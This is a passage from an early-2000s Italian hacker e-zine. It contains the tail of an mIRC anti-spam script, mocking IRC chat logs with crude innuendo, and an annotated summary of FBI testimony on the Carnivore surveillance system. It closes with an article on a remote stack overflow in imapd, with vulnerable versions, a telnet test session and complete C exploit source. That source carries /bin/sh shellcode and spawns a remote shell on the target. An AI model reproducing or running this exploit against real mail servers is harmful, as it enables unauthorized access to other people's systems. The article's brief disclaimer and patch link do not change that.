n114=on !1:notice:*:?: {
n115= %spam-ricerca-loop = 0
n116= :loop
n117= inc %spam-ricerca-loop
n118= %spam-ricerca-ok = $gettok(%spam-parole,%spam-ricerca-loop,44)
n119= %spam-ricerca-stringa = $remove($strip($1-),$chr(44))
n120= if (%spam-ricerca-ok) {
n121= if ($findtok(%spam-ricerca-stringa,%spam-ricerca-ok,0,*) > 0) || ($findtok(%spam-ricerca-stringa,%spam-ricerca-ok,0,32) > 0) {
n122= if (%spam-ignore == 1) {
n123= close -m $nick
n124= ignore -u [ $+ [ %spam-tempoignore ] ] $nick %spam-ignoremask
n125= inc %spam.bloccati
n126= msg $nick $versione.antipspam La Parola " $+ %spam-ricerca-ok $+ " e' nel mio Blocca-spam
n127= echo -s $bloccato " $+ %spam-ricerca-ok $+ "
n128= $cancella
n129= }
n130= else {
n131= inc %spam.bloccati
n132= msg $nick $versione.antipspam La Parola " $+ %spam-ricerca-ok $+ " e' nel mio Blocca-spam
n133= echo -s $bloccato " $+ %spam-ricerca-ok $+ "
n134= $cancella
n135= }
n136= }
n137= else { goto loop }
n138= }
n139= unset %spam-ricerca-*
n140=}
n141=#spam end
n142=;============> Aliases
n143=alias aggiungi.parola {
n144= if ($did(spam,9).text) && ($findtok(%spam-parole,$did(spam,9).text,0,44) < 1) && ($chr(44) !isin $did(spam,9).text) {
n145= %spam-parole = $addtok(%spam-parole,$did(spam,9).text,44)
n146= did -a spam 10 $did(spam,9).text
n147= did -r spam 9
n148= }
n149=}
n150=alias deleta.parola {
n151= if ($did(spam,10).sel) {
n152= :loop
n153= %spam-parole = $remtok(%spam-parole,$did(spam,10,$did(spam,10).sel).text,44)
n154= did -d spam 10 $did(spam,10).sel
n155= if ($did(spam,10,0).sel > 0) {
n156= goto loop
n157= }
n158= }
n159=}
n160=alias spegni {
n161= set %status-antispam AntiSpam Spento
n162= did -r spam 2
n163= did -a spam 2 %status-antispam
n164= ./.disable #spam
n165= echo -a $spentoz
n166=}
n167=alias accendi {
n168= set %status-antispam AntiSpam Attivo
n169= did -r spam 2
n170= did -a spam 2 %status-antispam
n171= ./.enable #spam
n172= echo -a $attivoz
n173=}
n174=alias diddalo {
n175= if ($did(spam,13).state == 1) {
n176= did -e spam 14
n177= did -e spam 15
n178= did -e spam 16
n179= did -e spam 17
n180= }
n181= else {
n182= did -b spam 14
n183= did -b spam 15
n184= did -b spam 16
n185= did -b spam 17
n186= }
n187=}
n188=alias sbiliguda {
n189= %spam-ignore = $did(spam,13).state
n190= %spam-tempoignore = $did(spam,15).text
n191= %spam-ignoremask = $did(spam,17).sel
n192=}
n193=alias -l spam-parole {
n194= %spam-parole-caricate = 0
n195= :loop
n196= inc %spam-parole-caricate
n197= if ($gettok(%spam-parole,%spam-parole-caricate,44)) {
n198= did -a spam 10 $gettok(%spam-parole,%spam-parole-caricate,44)
n199= goto loop
n200= }
n201= unset %spam-parole-caricate
n202=}
n203=alias cancella { clear -s }
n204=alias bloccato { return 4<<< 7Spam bloccato4 >>> }
n205=alias attivoz { return 4<<< 7AntiSpam Attivo4 >>> }
n206=alias spentoz { return 4<<< 7AntiSpam Spento4 >>> }
n207=alias versione.antipspam { return 4<<< 7AntiSpam http:\\www.hackersat.com 4 >>> }
n208=;============> Menu
n209=menu menubar,status {
n210= [=== AnTI-SpaM ===]:/dialog -m spam spam
n211=}
_____________________________________________________________________________________
MA TORNIAMO A NOI.
Ci sarebbe un'altro metodo cioè quello di mettere come proprio nickname ad
esempio "sono_m", ci ho provato una volta (ero proprio esausto per farlo) e
devo dire che ha funzionato proprio bene!Solo che l'inconveniente è proprio il
nick :non vi sembra orrendo ??
cmq adesso vi continuo a riportare queste caxxatelle di log :)
adesso ci provo io.Ho visto il nick Pandoram e allora mi ricordai una vecchia
filastrocca!!
Session Start: Tue Mar 27 20:15:40 2001
20:15:42 <ssYYnn> ciao
20:16:13 <ssYYnn> pandora ti porterò al palazzo,ti mostrerò il mio ca..ro e amato genitor...
20:16:15 <ssYYnn> hihih
20:16:18 <ssYYnn> ci 6 ?
Session Close: Tue Mar 27 20:25:21 2001
Comunque la filastrocca continuava così se non vado errato : pandora ti porterò in
bottega, tu mi farai una se..mplice dichiarazione d'amor. Pandora andremo
nella **iga (diga?), mi mostrerai la fi..ne di questo grande amor.
andiamo avanti .
Session Start: Mon Mar 26 21:42:01 2001
21:42:01 <io75> ciao m o f
21:42:07 <ssYYnn> m
Session Close: Mon Mar 26 21:42:08 2001
Uno dei discorsi + lungo di tutto il secolo! Questi sono ragazzi che non vogliono
nemmeno sprecare un po' di tempo,xchè o sono alla caccia disperata o sono dei
tirati di primo ordine!
adesso alle prese con un mongoloide!
Session Start: Sat Mar 24 20:01:13 2001
20:01:13 <matteo29^> ciao principessa!come stai?
Session Close: Sat Mar 24 20:01:18 2001
Non stai bene ?? Una principessa di nome sYn non laho mai vista, ma...no comment!
avanti.
Session Start: Sat Mar 24 20:06:11 2001
20:06:11 <shevchenk> ciao
20:06:19 <ssYYnn> ciao
20:06:20 <ssYYnn> sono m
Session Close: Sat Mar 24 20:06:24 2001
lungo anche questo.
avanti.
Session Start: Mon Mar 26 21:33:38 2001
21:33:38 <vivagiorgio> CIAO
21:33:44 <ssYYnn> ciao
21:33:45 <ssYYnn> sono m
21:33:55 <vivagiorgio> OK
21:33:59 <vivagiorgio> GRAZIE
21:34:01 <vivagiorgio> CIAO
Session Close: Mon Mar 26 21:34:03 2001
NON CI POSSO CREDERE? Era un grazie quello? Impossibile sono stato alle prese con un
ragazzo che usa l'educazione in chat! Questo è da prendere come esempio e modello.
MA (xchè c'è sempre un MA nella vita...) questo è un caso.
Ragazzi mi sono un po' annoiato ,per non dire un'altra parola. Devo pensare a fare
altre cose quindi adesso vi lascio.Spero che questo articolo vi sia piaciuto e vi
abbia fatto conoscere come è "fatta" la chat su IRC e il contrasto tra i sessi opposti.
Dovete capire bene come ci si deve comportare alle prese di "affamati" ragazzi;
alcuni logs io non li ho messi ma molti mi auguravano anche buona caccia! HIHIHIHIH.
(Che bello manca la mia prof di italiano per tutta la settimana, ieri sono stato in
gita, e ho pariato tantooo.Abbiamo conosciuto cinesi e spagnole, con quest'ultime
abbiamo parlato a fondo con i nostri commenti in dialetto napoletano che si potevano
nascondere!!Nel pullman abbiamo fatti i giochi + bambineschi di questo pianeta, e
dopo mi so' messo ad ascoltare un po' i Placebo ; Cavolo mi avete rotto le cuffie!!!)
Ho fatto questa parentesi xchè mi hanno riferito che potevo scrivere di tutto ..hihih;
fate finta cmq che io non abbia detto niente.
IMMACOLATA TI AMO
GIADA TI AMO
SARA TI AMO
!!!
Vi voglio bene a tutti! (sopratutto a Smav!)
Volevo salutare in particolare Skam e Ghent dell'h@.
per qualunque cosa o incomprensione scrivetemi.
sYn
--=|www.hackersat.com|=----=|syn@hackersat.com|=--
/===========================::=============================::=================/
/ /Carnivore Diagnostic Tool / Screener_it /
/===========================::=============================::=================/
Carnivore Diagnostic Tool
*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\
Autore: Screener_it
email: screener_it@freemail.it
URL: http://go.to/tankcommandos
DATA: 22/03/01
*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\
Le presenti informazioni sono facilmente recuperabili in Rete, anche sul sito dell'FBI.
Quindi su questo articolo non saranno dette cose sconosciute totalmente, ma verranno
solo trattate argomentazioni sconosciute ai più.
*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\
Siamo davvero soli ? Il 6 settembre 2000 questa domanda ha avuto una risposta.
La risposta è NO.
Il 6 settembre 2000 il signor Donald M. Kerr presentava al senato degli Stati
Uniti d'America (USA) il programma Carnivore.
Con questa data anche la più piccola speranza di anonimimato in Rete è sparita.
Tra virgolette ( " " ) saranno riportati passi del discorso pronunciato il 6 settembre.
E voi credevate che con Echelon finisse tutto..
*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\
"Buongiorno , Mr Chairman e membri del comitato. Vi sono grato per l'oppportunità di
poter parlare di Carnivor - un sistema designato specificamente per forzare la privacy
e allo stesso tempo rispettare la legge.
Carnivore è un sistema che contiamo possa venirci in aiuto nei casi critici di
combattimento al terrorismo, allo spionaggio, alla guerra d'informazioni, all'hacking ed
altri crimini violenti che usano Internet, per difendere la nostra Nazione e la nostra gente.
Nel mio discorso toccherò principalmente 5 punti:
1.- Perchè abbiamo bisogno di un sistema come Carnivore
2.- Perchè il publico deve essere a conoscenza del fatto che Carnivore esista
3.- Come lavora Carnivore
4.- Perchè gli ISP non devono avere timore dell'uso di Carnivore
5.- Perchè il pubblico deve essere fiducioso che l'uso di Carnivore non lederà la loro privacy"
Credo che abbiate capito che cosa sia a grandi linee Carnivore. Un programma che una
volta installato dai provider su richiesta (richiesta o obbligo ?) del FBI è in grado
d'intercettare qualsiasi comunicazione.
In questi anni l'FBI è andata incontro a un largo numero di criminali che usavano
Internet per comunicare tra di loro o per comunicare con le loro vittime.
Spesso però i provider di appartenenza di questi criminali non hanno gli strumenti
necessari per intervenire salvaguardando la privacy degli altri utenti.
In parole povere possono controllare le e-mail, ma devono controllarle tutte, non
hanno gli strumenti necessari per bloccare quelle che vengono da un determinato utente
o da un determinato abbonamento.
Proprio per venire incontro a questi provider il laboratorio dell'FBI ha creato Carnivore.
Carnivore, ascoltando la definizione che ha l'FBI, ha una capacità "chirurgica" di
intercettare e loggare particolari comunicazioni che infrangono la legge, lasciando
stare le altre, evitando così intercettazioni non autorizzate.
Carnivore lavora come molti degli "sniffer" in circolazione e altri tool usati dagli
ISP tutti giorni con la differenza però che ha la straordinaria capacità di distinguere
tra comunicazioni che possono essere legalmente intercettate e quelle che non possono esserlo.
Ad esempio può (opportunamente configurato) intercettare solo un tipo di
comunicazione (e-mail ad esempio) ed escludere le altre (es. shopping online) oppure
può essere configurato per controllare solo le email che provengono o che vengono
indirizzate a un particolare indirizzo.
"1.- Perchè l'FBI ha bisogno di Carnivore ?
E' cosa risaputo che terroristi, spie, hacker [ma ci mettono sullo stesso piano ?] e
altri pericolosi criminali usano sempre di più il computer e le reti, inclusa Internet,
per portare a termine i loro piani criminali.
Carnivore è la nostra risposta , per salvaguardare la nostra Nazione, la popolazione
americana [gli europei no, puzziamo troppo.. :)) ], la sicurezza delle nostre
comunicazioni e la sicurezza dei privati e per una Internet più sana e sicura.
Per questo l'FBI concentra le sue forze, compresa la ricerca tecnologica, per
combattere questi cyber criminali"
Faccio notare tutti la continua presenza della parola criminali associata a Internet..
"2.- Perchè il publico deve essere a conoscenza del fatto che Carnivore esista"
Vi risparmio tutto il discorso, in quanto infarcito di riferimenti a leggi varie.
Il discorso più che altro è legato al fatto che nonostante ci siano delle leggi in
materia di Privacy anche in Internet, loro sono autorizzati a non rispettarle,
se questo è utile alla protezione della sicurezza.
Il pubblico và informato del fatto che Carnivore esiste perchè così tutti sappiamo
che possono farci il culo quando e come vogliono e che lo fanno in maniera completamente
legale.. Bello, no ?
"3.- Come lavora Carnivore e perchè l'FBI crede che sia più attendibile, preciso e
tecnologicamente superiore degli sniffer commerciali ?
Carnivore è veramente un tool studiato per le intercettazioni telematiche.
Il programma è un filtro che l'FBI ha sviluppato con cura, precisione e rispettando la legge.
In particolare, il programma permette all'FBI, con la compiacenza della costituzione
federale, le intercettazione telematiche di tutte le comunicazioni permettendo agli
investigatori di acquisire il maggior numero di informazioni possibili sul bersaglio.
Carnivore è superiore a qualsiasi "sniffer" esistente in commercio che gli ISP usano
ogni giorno sul loro network.
La concezione di intercettazioni con gli altri sniffer è molto chiusa e con essi
viene infranta ogni possibile legge sulla privacy.
Non sono stati creati per le intercettazioni.
E' importante descrivere quando e come Carnivore lavora. E' importante spiegare cosa
il programma mostra e, più importante, cosa non mostra agli agenti dell'FBI che lo usano.
Prima di tutto, Carnivore verrà usato solo quando l'FBI avrà il permesso della
corte (o quando la legge lo consente) ad intercettare o ad acquisire informazioni
sul criminale, come ad esempio il suo indirizzo, il suo numero account ec..
Secondo, quando un ISP può collaborare completamente con la corte [mostrare i
log insomma] l'FBI non avrà la necessità di impiegare Carnivore.
Terzo, l'uso del programma può essere fatto solo con la collaborazione dei tecnici
dell'ISP e l'FBI non può usarlo senza la loro cooperazione.
Quarto, una volta messo al lavoro Carnivore potrà analizzare solo il piccolo segmento
di traffico del network che verrà usato dall'obbiettivo e dove le sue comunicazioni
possono passare.
Il programma non può avere accesso di tipo "Grande Fratello", cioè non può controllare
tutto il traffico dell'ISP. [dobbiamo crederci ?].
Per illustrare le funzionalità di Carnivore è importante capire che Carnivore filtra solo
le informazioni che gli servono.
La sua prima operazione è filtrare una porzione della traffico dell'ISP.
Lo filtra in codice binario, una serie di 0 e 1 che scorre attraverso la rete dell'ISP,
per esempo, a 40 megabit al secondo, spesso a una velocità maggiore.
Carnivore lavora in tempo reale con queste velocità. Per visualizzare meglio il concetto,
provate a pensare a un enorme schermo che contiene 40 milioni di 0 e 1 che appaiono sullo
schermo per 1 secondo e 1 secondo solo.
La prima operazione di Carnivore sarà quella di identificare se e quali di quegli 0 e 1
appartengono al criminale e a quale tipo di comunicazione appartengono (infatti se
hanno il permesso di intercettare solo le email, non possono intercettare l'FTP).
Se trovato, il paccheto che contiene le informazione del soggetto in questione viene
ulteriormente filtrato.
E' importante comunque ricordare che quei 40 milioni di 0 e 1 che non centrano nulla
on il criminale in questione non vengono in alcun modo salvati, essi si vaporizzano
dopo 1 secondo.
Puff, spariti, vaporizzati, non vengono collezionati, salvati o venduti.
Il personale dell'FBI non vedrà mai nessuno di questi 40 milioni di 0 e 1.
Se non ci sono informazioni del soggetto in questione in questo schermo si
passerà allo schermo successivo che sarà trattato sempre con lo stesss sistema.
A questo le informazioni del soggetto sotto controllo passeranno ad un altro filtro,
che controllerà di che siano queste informazioni e solo se appartengono al tipo di
comunicazione di cui si ha l'autorizzazione di intercettazione. Solo ora, dopo che è
stato filtrato tutto, gli addetti dell'FBI vedranno il risultato.
4.- Perchè gli ISP non devono avere timore dell'uso di Carnivore
Carnivore lavora solo su una piccola parte del server, ovvero la parte dove
è possibile che passino i dati che riguardano il soggetto sotto osservazione (come
già detto prima).
Carnivore è collegato al server attraverso un ponte fisico che gli impedisce di
trasmettere dati di qualsiasi tipo al resto del network, quindi non ha potere di
trasmettere dati o qualsiasi altra cosa al netowrk.
Ma Carnivore non è mai stato installato e non sarà mai installato senza
l'autorizzazione del personale del personale del provider.
Internet è una rete molto complicata e in continua evoluzione e le assicuro che
senza le conoscenze tecniche del personale dell'ISP sarebbe molto difficile, e
in alcuni casi davvero impossibile, controllare il soggetto.
In più l'FBI non potrebbe lavorare senza le informazioni che danno i tecnici
riguardo all'architettura e ai protocolli del server.
Qualcuno ha mossa la critica che Carnivore aumenterebbe le possibilità di essere
vittime di hacking. Ma sbagliano.
Con rispetto per l'hacking e considerando le tecniche hacking più usate, non ci
sono significativi aumenti di insicurezza nell'usare Carnivore.
In più dato che Carnivore è uno strumento dell'FBI usarlo come punto di accesso
per altri network sarebbe da pazzi per il rischio che si corre [effettivamente
farla in barba all'FBI sarebbe come consegnarsi in prigione..] e in più come
detto precedentemente Carnivore non ha accesso al resto del network [può solo
ricevere dati, non risponde]
In ultima c'è la faccenda che secondo un particolare ISP l'uso di Carnivore ha
causato il crash del suo sistema e altri problemi nel network.
Ma queste dichiarazioni sono sbagliate. Prima di tutto la causa dei problemi del
network (non ci fù crash) era semplicemente di natura tecnica e quindi di esclusiva
competenza dei tecnici del network.
[bel modo di scaricare le colpe..]
5.- Perchè il pubblico deve essere fiducioso che l'uso di Carnivore non lederà la
loro privacy
Crediamo che il popolo americano abbia fiducia nell'FBI per la sua condotta del
controllo elettronico, principalmente perchè hanno capito che noi lavoriamo nel
rispetto della legge, dopo che il congresso emanò la 40 anni fà la prima legge
sulla sorveglianza elettronica nel 1968.
Molti dicono che i metodi dell'FBI sono illegali. E' sbagliato, non ci sono prove
che lo dimostrino.
Ogni azione è autorizzata da un tribunale e l'FBI non ha mai abusato del suo potere.
Cominciamo col dire che tutte le investagazioni dell'FBI, ogni sorveglianza, ogni
intercettazione, ogni perquisizione è autorizzata, monitorata e supervisionata per
ogni passo dal locale studio legale e le corte legale o da un magistrato.
Ogni nostra azione è controllata e approvata da chi di competenza in quel campo e
in quello stato.
Negli ultimi 30 anni le intercettazioni elettroniche dell'FBI sono state strettamente
supervisionate dal dipartimento di giustizia e non ci sono mai stati absui. Anzi, il
dipartimento di giustizia ha sempre indicato i nostri modelli come modelli di
correttezza, cura e rispetto della legge nelle intercettazioni.
A questo punto può essere utile parlare del personale che utilizzerà Carnivore.
Cominciamo col dire che tutti gli impiegati dell'FBI sono persone che hanno dimostrato
onestà, rispetto della legge, integrità personale.
Tutto questo può essere dimostrato con la loro condotta che ha portato all'attuale
sicurezza nazionale e al livello investigativo.
Per essere sicuri la struttura dell'FBI fà crollare presto se gli agenti assunti si
dimostrano non degni di fiducia o se non mantengono la riservatezza riguardo al loro
impiego."
6 settembre 2000 - Donald M. Kerr
Questo è un sunto del discorso di Kerr, naturalmente non è una traduzione completa di
ogni singolo passo, ma ho estratto le parti più importanti.
Spero comunque che questa lettura vi faccia capire che la possibilità di essere tracciati
esiste sempre, non siete mai anonimi, posso sempre sapere chi siete.
Qualke link per sapere di più ?
www.fbi.gov --> Andate su Search e scrivete Carnivore.. Troverete molta roba
http://www.fbi.gov/congress/congress00/kerr090600.htm
http://www.fbi.gov/programs/carnivore/
*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\
Un saluto a tutti quelli del Tank Commandos, a Bismark.it [che mentre chiudo è
chiuso x problemi con pedofilia], a quelli di Dirty Net, a quelli di irc.azzurra.it,
agli U.TN.
*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\
/===========================::=============================::=================/
/ /Imapd exploit / SPYRO /
/===========================::=============================::=================/
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
/ -
|--> /Disclaimer
|--> /Info_su_Imapd_&_Exploit
|--> /Versioni_vulnerabili
|--> /Distribuzione_di_Linux_con_Demone_vulnerabile
|--> /Testare_le_condizioni_x_attuare_exploit
|--> /Impatto_dopo_funzionamento_exploit
|--> /Correzione_exploit
|--> /Codice_sorgente_exploit
|--> /Ringraziamenti_e_Saluti
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
bash# cd /Disclaimer
bash# cat disclaimer.txt
Quello che riporterò qui di seguito,sarà la spiegazione di un'exploit che ha lo scopo di far
ottenere l'accesso ad un server tramite esso.
Al giorno d'oggi la rete pultroppo è piena di lamer,e io con questo testo non vorrei contribuire
alla nascita di nuovi,qundi pensateci due volte prima di mettere in atto queste informazioni.
Io ho scritto questo testo soltanto x mettere in evidenza i problemi di sicurezza riguardanti la
rete.
Quindi se farete danni a voi stessi o ad altre persone,NE IO,NE L'AUTORE DEL BUG,ci rendiamo
responsabili!
Tutto a scopo informativo!
Siete RESPONSABILI delle vostre azioni.
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
bash# cd /Info_su_Imapd_&_Exploit
bash# cat info.txt
Imapad è il più popolare e famoso demone per mail service usato dagli ISP's di tutto il mondo.
Sviluppato dalla Washington´s University,imapad è un programma usato con molti servizi di Webmail.
Quindi è possibile usufruire del demone da remoto,precisamente sulla porta 143.
Recentemente è stato trovato un'exploit da remoto basat su un metodi di Stack overflow,ovvero
un'eccedenza di dati.
Il programma riceve segnali SIGSEGV,e lo mandano in Segmentation fault,ovvero si impianta =)
0x41414141 in ?? ()
(gdb)
Questo Bug è stato scoperto da uno specialista in sicurezza di nome Felipe Cerqueira,
(fcerqueira@bufferoverflow.org),che ha scritto un remote exploit in C per questo demone.
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
bash# cd /Versioni_vulnerabili
bash# cat vers.txt
Non tutte le versioni di Imapad sono vulnerabili,e qui di seguito elencherò quelle che lo sono:
-- IMAP4rev1 v12.261
-- IMAP4rev1 v12.264
-- IMAP4rev1 2000.284
Nota: L'exploit è stato testato solo sulle versioni di Imapad che ho elencato sopra,ciò non
toglie il fatto che anche altre versioni siano buggate da questo remote exploit.
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
bash# cd /Distribuzione_di_Linux_con_Demone_vulnerabile
bash# cat distro.txt
Riporto un piccolo schema per capire quale distribuzione di linux,ha il demone buggato.
______________________________________________
| Distro. | Vulnerabile? |
|-------------------------|--------------------|
|Slackware 7.0 | SI |
| | |
|Suse Linux | ? |
| | |
|Corel Linux | ? |
| | |
|Conectiva Linux 6.0 | SI |
| | |
|Mandrake Linux | NO |
| | |
|RedHat 6.2 Zoot | SI |
| | |
|Debian Linux | ? |
| | |
|Slackware 7.0 | SI |
----------------------------------------------
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
bash# cd /Testare_le_condizioni_x_attuare_exploit
bash# cat test.txt
Per mettere in atto questo exploit,prima dobbiamo fare delle prove alla linux box.
Per farlo,basta seguire questo tipo di comandi:
telnet> open 266.299.992.662 143
* OK localhost IMAP4rev1 v12.261 server ready
1 login felipe felipe
1 OK LOGIN completed
1 lsub "" {1064}
+ Ready for argument
A*1064
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
bash# cd /Impatto_dopo_funzionamento_exploit
bash# cat impatto.txt
Se l'exploit va a buon fine,ovvero funziona,cosa accade e cosa ci compare?
Avverrà che avremo un'accesso da remoto senza permessi di root,ma con UID e GID di un'user auten
ticato nell'imap server.
Quindi per roottare la shell,andrebbe usato un'exploit da locale(da non fare). ;)
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
bash# cd /Correzione_exploit
bash# cat correxp.txt
Per correre ai ripari da questo exploit,non bisogna far altro che collegarsi su:
ftp://ftp.cac.washington.edu/imap
e scaricarsi la nuova versione di IMAP(IMAP200c - 2000.287) dove è stato corretto il problema.
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
bash# cd /Codice_sorgente_exploit
bash# cat imapd.c
-------------------------------------------Exploit-----------------------------------------------
/*
* !!! Private !!!
*
* imapd IMAP4rev1 v12.261, v12.264 and 2000.284 Remote Exploit. Others? Yes!
*
* By: SkyLaZarT ( fcerqueira@bufferoverflow.org ) .aka. Felipe Cerqueira
* Homepage: www.BufferOverflow.Org
* Thankz: cync, oldm and Jans. ( BufferOverflow.org Team )
* Antonio Marcelo and Felipe Saraiva
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#define SIZE 1064
#define NOP 0x90
#define RET12261 0xbffff3ec
#define RET12264 0xbffff4e0
#define RET12264ZOOT 0xbffff697
#define RET2000_284 0xbfffebc8
#define INIT(x) bzero(x, sizeof(x))
#define READ(sock,x) read(sock, x, sizeof(x))
#define TIMEOUT 20
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int debug = 0;
void openshell(int sock, int check);
void processSignal(int signum);
void processSignal(int signum) {
fprintf(stderr, "Time out!!\n");
exit(-1);
}
void openshell(int sock, int check) {
char buffer[1024];
fd_set rset;
int i;
while(1) {
FD_ZERO(&rset);
FD_SET(sock, &rset);
FD_SET(fileno(stdin), &rset);
select(sock + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET(sock, &rset)) {
if ((i = read(sock, buffer, sizeof(buffer))) <= 0) {
fprintf(stderr, "Connection terminated!\n");
close(sock);
exit(-1);
} else {
buffer[i] = 0x00;
if(check) {
if (!(strstr(buffer, "uid"))) {
fprintf(stderr, "Exploit failed\n");
exit(-1);
} else {
fprintf(stderr, "Exploit Success!!\n");
check = 0;
}
}
puts(buffer);
}
}
if (FD_ISSET(fileno(stdin), &rset)) {
if ( check ) write(sock, "id\n", 3);
if ((i = read(fileno(stdin), buffer,
sizeof(buffer))) > 0) {
buffer[i] = 0x00;
write(sock, buffer, i);
}
}
}
}
int main(int argc, char **argv) {
char buffer[SIZE], sockbuffer[2048];
char *login, *password;
long retaddr;
struct sockaddr_in sin;
struct hostent *hePtr;
int sock, i;
fprintf(stderr, "\nRemote exploit for IMAP4rev1 v12.261, v12.264 and 2000.284\n"
"Developed by SkyLaZarT - www.BufferOverflow.org\n\n");
if ( argc < 5 ) {
fprintf(stderr, "%s <host> <login> <password> <type> [offset]\n", argv[0]);
fprintf(stderr, "\ttype: [0]\tSlackware 7.0 with IMAP4rev1 v12.261\n"
"\ttype: [1]\tSlackware 7.1 with IMAP4rev1 v12.264\n"
"\ttype: [2]\tRedHat 6.2 ZooT with IMAP4rev1 v12.264\n"
"\ttype: [3]\tSlackware 7.0 with IMAP4rev1 2000.284\n\n");
exit(-1);
}
login = argv[2];
password = argv[3];
switch(atoi(argv[4])) {
case 0: retaddr = RET12261; break;
case 1: retaddr = RET12264; break;
case 2: retaddr = RET12264ZOOT; break;
case 3: retaddr = RET2000_284; break;
default:
fprintf(stderr, "invalid type.. assuming default "
"type 0\n");
retaddr = RET12261; break;
}
if ( argc == 6 )
retaddr += atoi(argv[5]);
signal(SIGALRM, processSignal);
fprintf(stderr, "Trying to exploit %s...\n", argv[1]);
fprintf(stderr, "Using return address 0x%08lx. Shellcode size: %i bytes\n\n", retaddr, strlen(shellcode));
alarm(TIMEOUT);
hePtr = gethostbyname(argv[1]);
if (!hePtr) {
fprintf(stderr, "Unknow hostname : %s\n", strerror(errno));
exit(-1);
}
alarm(0);
sock = socket(AF_INET, SOCK_STREAM, 0);
if ( sock < 0 ) {
perror("socket()");
exit(-1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(143);
memcpy(&sin.sin_addr, hePtr->h_addr, hePtr->h_length);
bzero(&(sin.sin_zero), 8);
fprintf(stderr, "Connecting... ");
alarm(TIMEOUT);
if ( connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0 ) {
fprintf(stderr, "failed to %s:143\n", argv[1]);
exit(-1);
}
alarm(0);
fprintf(stderr, "OK\n");
for ( i = 0; i <= SIZE; i += 4 )
*(long *)&buffer[i] = retaddr;
for ( i = 0; i < ( SIZE - strlen(shellcode) - 100); i++ )
*(buffer+i) = NOP;
memcpy(buffer + i, shellcode, strlen(shellcode));
INIT(sockbuffer);
READ(sock, sockbuffer);
if(debug) fprintf(stderr, "debug %s", sockbuffer);
fprintf(stderr, "Trying to loging ... ");
sprintf(sockbuffer, "1 LOGIN %s %s\n", login, password);
write(sock, sockbuffer, strlen(sockbuffer));
INIT(sockbuffer);
READ(sock, sockbuffer);
if(debug) fprintf(stderr, "debug %s", sockbuffer);
if (!(strstr(sockbuffer, "OK LOGIN completed"))) {
fprintf(stderr, "Login failed!!\n");
close(sock);
exit(-1);
}
fprintf(stderr, "OK\n");
INIT(sockbuffer);
sprintf(sockbuffer, "1 LSUB \"\" {1064}\r\n");
write(sock, sockbuffer, strlen(sockbuffer));
INIT(sockbuffer);
READ(sock, sockbuffer);
if(debug) fprintf(stderr, "debug %s", sockbuffer);
if(!(strstr(sockbuffer, "Ready"))) {
fprintf(stderr, "LSUB command failed\n");
close(sock);
exit(-1);
}
fprintf(stderr, "Sending shellcode... ");
write(sock, buffer, 1064);
write(sock, "\r\n", 2);
fprintf(stderr, "OK\n");
fprintf(stderr, "PRESS ENTER for exploit status!!\n\n");
openshell(sock, 1);
close(sock);
return 0;
}
-------------------------------------------Exploit-----------------------------------------------
--------------------------------------------INFORMAZIONE-----------------------------------------
#include <stdio.h>
main(){
printf("Ho messo il sorgente originale\n");
printf("se qualcosa non vi funziona,non è di mia competenza\n");
}
--------------------------------------------INFORMAZIONE-----------------------------------------
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
bash# cd /Ringraziamenti_e_Saluti
bash# cat saluti.txt
Ringraziamenti: Ringrazio particolarmente Antonio Marcelo,autore e scrittore dell'exploit,da cui
ho preso lo spunto per scrivere questo testo.
Antonio Marcelo
Security Specialist
Bufferoverflow.org
-- BufferOverflow.Org Security Advisory --
-- Date: February/20/2001
-- A stack overflow in imapd
Saluti: Bakunin(Mio grande maestro),AtlaWare,mR_bIs0n(Mio Fratellone),Spawn,BsTHaCk,Anubi,D4rkSt4r.
Radion,Warning,Terror,Gouranga,Blender,Prodigy,Hiloz[83],Memorik,Hedo,MrWolf,Screen_it,zapotecz,
